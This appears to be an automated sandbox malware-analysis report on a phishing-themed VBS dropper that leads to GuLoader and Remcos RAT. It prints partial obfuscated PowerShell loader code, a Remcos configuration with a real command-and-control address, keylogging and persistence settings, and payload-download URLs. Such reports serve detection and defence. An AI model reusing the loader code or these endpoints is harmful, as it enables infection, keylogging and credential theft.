    00000005.00000002.2447272423.00000000089C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000005.00000002.2442003706.0000000005E33000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000008.00000002.3271388779.0000000002A7F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000005.00000002.2447423096.000000000B13D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 6 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_3528.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_1084.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xedc5:$b2: ::FromBase64String(
                • 0xde49:$s1: -join
                • 0x75f5:$s4: +=
                • 0x76b7:$s4: +=
                • 0xb8de:$s4: +=
                • 0xd9fb:$s4: +=
                • 0xdce5:$s4: +=
                • 0xde2b:$s4: +=
                • 0x17ebd:$s4: +=
                • 0x17f3d:$s4: +=
                • 0x18003:$s4: +=
                • 0x18083:$s4: +=
                • 0x18259:$s4: +=
                • 0x182dd:$s4: +=
                • 0xe672:$e4: Get-WmiObject
                • 0xe861:$e4: Get-Process
                • 0xe8b9:$e4: Start-Process
                • 0x18b4d:$e4: Get-Process

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs", ProcessId: 7160, ProcessName: wscript.exe
                Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj", CommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5652, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj", ProcessId: 3228, ProcessName: wab.exe
                Sigma detected: Suspicious Copy From or To System Directory
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlBennetdoChromopbBlistenardgrd nlbo pisr:WindbloF
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs", ProcessId: 7160, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlBennetdoChromopbBlistenardgrd nlbo pisr:WindbloF

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 5652, TargetFilename: C:\ProgramData\remcos\logs.dat

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "103.237.87.32:1999:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VEYV6I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Multi AV Scanner detection for domain / URL
                Source: http://103.237.86.247/mtyozjDM72.binVirustotal: Detection: 10%Perma Link
                Source: http://103.237.86.247/acidizes.msoVirustotal: Detection: 10%Perma Link
                Multi AV Scanner detection for submitted file
                Source: PAYMENT - STATEMENT ADVISE.vbsReversingLabs: Detection: 37%
                Source: PAYMENT - STATEMENT ADVISE.vbsVirustotal: Detection: 14%Perma Link
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3271388779.0000000002A7F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Binary string: indows\System.Core.pdb* source: powershell.exe, 00000005.00000002.2444255599.00000000076F9000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_240C10F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240C6580 FindFirstFileExA,8_2_240C6580
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: 103.237.87.32
                Source: global trafficTCP traffic: 192.168.2.5:64545 -> 103.237.87.32:1999
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewIP Address: 103.237.86.247 103.237.86.247
                Source: Joe Sandbox ViewASN Name: BGNR-AP2BainandCompanySG BGNR-AP2BainandCompanySG
                Source: global trafficHTTP traffic detected: GET /acidizes.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /mtyozjDM72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: global trafficHTTP traffic detected: GET /acidizes.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /mtyozjDM72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: wab.exe, 00000008.00000002.3287023885.0000000024090000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: wab.exe, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: wab.exe, 00000008.00000002.3287311337.0000000024500000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: wab.exe, 00000008.00000002.3287311337.0000000024500000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.2
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.23
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.8
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.2
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.24
                Source: powershell.exe, 00000002.00000002.2582058655.00000192819AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2582058655.000001928022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/a
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/ac
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/aci
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/acid
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/acidi
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/acidiz
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/acidize
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/acidizes
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/acidizes.
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/acidizes.m
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/acidizes.ms
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/acidizes.mso
                Source: powershell.exe, 00000002.00000002.2582058655.000001928022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/acidizes.msoP
                Source: powershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/acidizes.msoXR
                Source: wab.exe, 00000008.00000002.3276172736.00000000084F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/mtyozjDM72.bin
                Source: wab.exe, 00000008.00000002.3276172736.00000000084F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/mtyozjDM72.binW
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281E1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237H
                Source: wscript.exe, 00000000.00000003.2000810163.00000203A10CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2002275025.00000203A10D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: wscript.exe, 00000000.00000003.2000810163.00000203A10CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2002275025.00000203A10D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabP
                Source: wscript.exe, 00000000.00000003.2000810163.00000203A10CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2002275025.00000203A10D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ent
                Source: wscript.exe, 00000000.00000003.1998069751.00000203A1123000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998183309.00000203A114B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d7cbb27807
                Source: wab.exe, 00000008.00000002.3276172736.00000000084F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: powershell.exe, 00000002.00000002.2695061689.0000019290072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2582058655.0000019280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2439904128.0000000004B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: wab.exe, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: wab.exe, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: wab.exe, 00000008.00000002.3287023885.0000000024090000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: wab.exe, 00000008.00000002.3287023885.0000000024090000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: powershell.exe, 00000002.00000002.2582058655.0000019280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.2439904128.0000000004B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
                Source: powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
